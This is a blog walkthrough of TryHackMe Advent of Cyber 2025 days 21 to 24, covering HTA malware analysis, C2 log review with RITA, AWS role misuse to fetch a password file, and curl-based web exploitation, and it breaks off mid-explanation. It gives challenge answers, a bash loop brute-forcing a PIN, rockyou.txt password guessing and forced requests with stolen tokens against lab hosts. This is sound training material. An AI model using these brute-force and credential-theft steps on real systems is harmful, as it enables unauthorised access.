Mahin Ahmad

Posted on Jan 3 • Edited on Jan 4

Advent of Cyber 2025 Day 21 22 23 24 Final Writeup & Bonus Question | TryHackMe

#cybersecurity #tryhackme

Day 21: Malware Analysis: HTA apps

👉Room Link
You can use the Attackbox or just download the 'malicious' file. Do not run it. Open your text ediltor and open the file(drag and drop the file or ctrl+o)

Task 2 questions are relatively easy. This is a hard one:

The HTA is enumerating information from the local host executing the application. What two pieces of information about the computer it is running on are being exfiltrated? You should provide the two object names separated by commas.
=>You can find it inside provideFeedback vba function! Just ctrl+f to find this string in the hta file.

Next question: What endpoint is the enumerated data being exfiltrated to?
Meaning the malware is getting those information and passing this to where? That's 2 lines down the last question.

What HTTP method is being used to exfiltrate the data?
=> GET, a 3 letter word.

What is the line of code that executes the contents of the download?
=> The line that starts with 'runObject.Run' 🙂

What popular encoding scheme was used in an attempt to obfuscate the download?
=> MD5, Base64 are pretty Popular

Decode the payload. It seems as if additional steps were taken to hide the malware! What common encryption scheme was used in the script?
=> Can't say base64 this time. From the vba programming it is apparent that letters were shifted. ROT13 is the answer.

=> Because ROT13(a cyclic algorithm) was used to encode, the algorithm to decode the string is also ROT13.

Now the most important question, its the optional question!

For those who want another challenge, download the HTA file from here to get the key for Side Quest 4, accessible through our Side Quest Hub. The password for the file is CanYouREM3?.

Day 22: C2 = Command & Control

👉Room Link
Just like attackers have a wide range of tools in their arsenal, defenders also have many tools, frameworks, end-to-end solutions etc.

Throughout Advent of Cyber, we have been acquainted with Splunk, Burp Suite Community Edition, the DevTools!, YARA and now RITA (Real Intelligence Threat Analytics).

Note: You are supposed to see a GUI, if not the click this:

RITA interfaces with zeek tool. Usually, a network activity can be recorded into a 'pcap file' format. But for today's use case we have to convert PCAP files to "Zeek logs": zeek readpcap pcaps/AsyncRAT.pcap zeek_logs/asyncrat command follows the format zeek readpcap inputFile outputDir

Then using RITA: rita import --logs ~/zeek_logs/asyncrat/ --database asyncrat

We are simply analyzing the logs and making a new database we named 'asyncrat'. Now we can browse through this 'result database' with rita view asyncrat

Note that you should open the VM in a new tab to see the rita view asyncrat output properly. There is an expand icon in the lower bar.

To answer the questions we need to analyze a different file rita_challenge.pcap.

How many hosts are communicating with malhare.net? => Count the lines in 'rita view databasename`
Which Threat Modifier tells us the number of hosts communicating to a certain destination? => scroll up the literature in 'Threat Modifier' section.
highest number of connections to rabbithole.malhare .net? => Use the arrow key and find the max "Connection Count":
Which search filter would you use to search for all entries that communicate to rabbithole.malhare .net with a beacon score greater than 70% and sorted by connection duration (descending)? => Refresh your memory by reading the Search bar section again in THM room.
communicate to rabbithole.malhare .net : dst:rabbithole.malhare.net
beacon:>=70 beacon score equal or greater than 70%
sorted by connection duration (descending): sort:duration-desc
Dont type in the VM, I find it slow. Type the entire thing here and paste into VM's RITA search bar.
Which port did the host 10.0.0.13 use to connect to rabbithole.malhare.net?
=> Bro just use the arrow keys and read the panel on the right

Day 23: AWS Security

👉Room Link
If you have never worked with AWS, no worries; just read through the very friendly THM literature.

Basically, AWS allows us to control our infrastructure resource programmatically via access keys, much like "api keys". We are authorized through environment variables that hold these keys, ensuring you have the necessary permissions.

Another very useful tool is the AWS CLI, which allows you to run AWS commands directly from your terminal and provision/manage your infrastructure. For example: aws ec2 run-instances to privision(create) a VIM(EC2 instace); aws sts get-caller-identity displays details about the IAM identity

Dont make my mistak in task 1! Actually run the command in the Target Machine VM:

Task 4 Question: Apart from GetObject and ListBucket, what other action can be taken by assuming the bucketmaster role?
=> Note that you have to assume the role of bucketmaster from the prevous task. Make sure to follow all the steps including exporting the new Access Keys.

lists the bucket and its objects.
To view the specific object(file) cloud_password.txt you also have to mention this as the 'key' argument:
see example in aws docs

aws s3api get-object --key cloud_password.txt --bucket easter-secrets-123145

This command is still incomplete. This we also have to type a 'filename' because this is basically a download operation.

I tried typing just - to show the it to the standard output, rather than saving to disk; but it didn't work. It showed the metadata instead:

cpass.txt is the downloaded 'cloud_password.txt' file:

Day 24: Exploitation with cURL

👉Room Link

A little bit of legendary history hurts nobody:

It gets cooler!

Curl is basically a command line tool to talk to other machines by sending http requests and many more.

Task 2 Questions:

Make a POST request to the /post.php endpoint with the username admin and the password admin. What is the flag you receive? => You will not get through if you try to be smart and use a user-agent header, because the task wants you to use the terminal, without any user-agent header.
Make a request to the /cookie.php endpoint with the username admin and the password admin and save the cookie. Reuse that saved cookie at the same endpoint. What is the flag you received? => First Login: curl -c cookie.txt -X POST -d "username=admin&password=admin" http://10.49.172.12/cookie.php Then simply use the cookie and send an empty GET: curl -b cookie.txt http://10.49.172.12/cookie.php
Just follow THM steps.
Make a request to the /agent.php endpoint with the user-agent TBFC. What is the flag your receive? => curl -A "TBFC" -s http://10.49.172.12/agent.php

Bonus Question:
Need to "identify endpoints, authenticate and obtain the operator token, and call the close operation."

curl -A "secretcomputer" http://10.49.172.12/terminal.php?action=panel

Note that our final goal is the 'close the portal'

But we need 3 things: session, operator token and X-Force header

Step 1: brute force the /login endpoint
You can use the old script in the THM room. or even ask GPT to make you a script that will utilize all the cpu cores!

Running the script with rockyou.txt
If you are not in the attackbox, then download it from here and extract the text file using gunzip rockyou.txt.gz

Go Outside and 𝔗𝔬𝔲𝔠𝔥 𝔤𝔯𝔞𝔰𝔰. 🌿🌱🍃

Step 2: Guess the PIN
Notice the /pin endpoint that gives us a temporary admin token. THM says the pin is between 4000 and 5000.

It's important to know that exploring and tinkering are the number one steps to break into anything. Expecting that there is a linear, step-by-step approach is a mistake.

If we 'fool around' we get a suggestion on how to attempt a pin value, compared to the "username=admin&password=admin" approach

`bash

for pass in $(seq 5000 -1 4000); do
# echo "Trying password: $pass"
resp=$(curl -sA "secretcomputer" -X POST -d "pin=$pass" http://10.48.172.152/terminal.php?action=pin)
if ! grep -q "fail" <<< "$resp"; then echo "$pass is the pin"; echo $resp; break; fi
# echo $resp
done
`

Note the type of user: operator . Does this mean we should bruteforce the login endpoint with username=operator? I'm writing this early by the way, step 1 is taking too much time, there are 14,344,391 different passwords to try!

Remember what happens when we try the close endpoint? We require three things: admin Session, operator token, and X-Force header.

The brute force is taking so much time that i have to look into a solution video 😑 Dude uses a tool called ffuf on a partial rockyou.txt. After an hour the script is at 121,000th password. The correct password "stellaris61" is at line 3,537,735!

We will save the session in our machine with -c flag.
curl -A "secretcomputer" http://10.48.172.152/terminal.php?action=login -X POST -d "username=admin&password=stellaris61" -c session.txt

Now we can hit the /close endpoint with our 'admin session' and our 'opertor token'! Need to figure out the custom X-Force header, lets try 'true' value?
curl -A "secretcomputer" http://10.48.172.152/terminal.php?action=close -X POST -d "username=admin&password=stellaris61&operator_token=7dce601fc5cf86aae78f1471e5af3220956de91cefd714e2ff399da426a79ced" -b session.txt -H "X-Force: true"

There is a mistake on how we used our operator_token. Following is the accurate way.